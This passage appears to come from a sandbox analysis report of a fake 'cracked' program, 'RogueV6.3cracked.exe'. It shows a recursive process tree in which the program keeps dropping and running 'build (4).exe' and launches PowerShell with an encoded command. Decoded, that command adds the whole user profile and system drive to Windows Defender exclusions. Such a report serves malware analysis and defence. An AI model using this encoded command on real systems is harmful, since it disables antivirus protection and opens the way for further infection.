C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="37⤵
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"37⤵
- Executes dropped EXE
PID:3684
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"37⤵PID:2112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="38⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7096
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"38⤵
- Executes dropped EXE
PID:6668
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"38⤵PID:6672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="39⤵
- Suspicious use of AdjustPrivilegeToken
PID:7080
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"39⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7000
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"39⤵PID:6276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="40⤵
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"40⤵
- Executes dropped EXE
PID:6684
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"40⤵PID:6560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="41⤵
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"41⤵
- Executes dropped EXE
PID:3852
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"41⤵PID:2876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="42⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"42⤵
- Executes dropped EXE
PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"42⤵PID:1664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="43⤵
- Suspicious use of AdjustPrivilegeToken
PID:5568
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"43⤵
- Executes dropped EXE
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"43⤵PID:3972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="44⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV145⤵PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"44⤵
- Executes dropped EXE
PID:7064
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"44⤵PID:3260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="45⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"45⤵
- Executes dropped EXE
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"45⤵
- System Location Discovery: System Language Discovery
PID:4508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="46⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"46⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6020
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"46⤵PID:6480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="47⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"47⤵
- Executes dropped EXE
PID:4720
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"47⤵PID:5252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="48⤵
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"48⤵
- Executes dropped EXE
PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"48⤵PID:5548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="49⤵
- Suspicious use of AdjustPrivilegeToken
PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"49⤵
- Executes dropped EXE
PID:6032
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"49⤵PID:6484
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="50⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"50⤵
- Executes dropped EXE
PID:4044
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"50⤵PID:5424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="51⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"51⤵
- Executes dropped EXE
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"51⤵PID:5336
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="52⤵
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"52⤵
- Executes dropped EXE
PID:1868
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"52⤵PID:5640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="53⤵
- Suspicious use of AdjustPrivilegeToken
PID:6928
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"53⤵
- Executes dropped EXE
PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"53⤵PID:5516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="54⤵
- Suspicious use of AdjustPrivilegeToken
PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"54⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"54⤵
- System Location Discovery: System Language Discovery
PID:4616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="55⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"55⤵
- Executes dropped EXE
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"55⤵PID:5460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="56⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"56⤵
- Executes dropped EXE
PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"56⤵PID:6052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="57⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"57⤵
- Executes dropped EXE
PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"57⤵PID:6064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="58⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6856
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"58⤵
- Executes dropped EXE
PID:5460
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"58⤵PID:6548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="59⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"59⤵
- Executes dropped EXE
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"59⤵PID:6256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="60⤵
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"60⤵
- Executes dropped EXE
PID:6284
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"60⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="61⤵
- Suspicious use of AdjustPrivilegeToken
PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"61⤵
- Executes dropped EXE
PID:6880
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"61⤵PID:1440
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"62⤵
- Executes dropped EXE
PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"62⤵PID:5736
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="63⤵
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"63⤵
- Executes dropped EXE
PID:7160
-
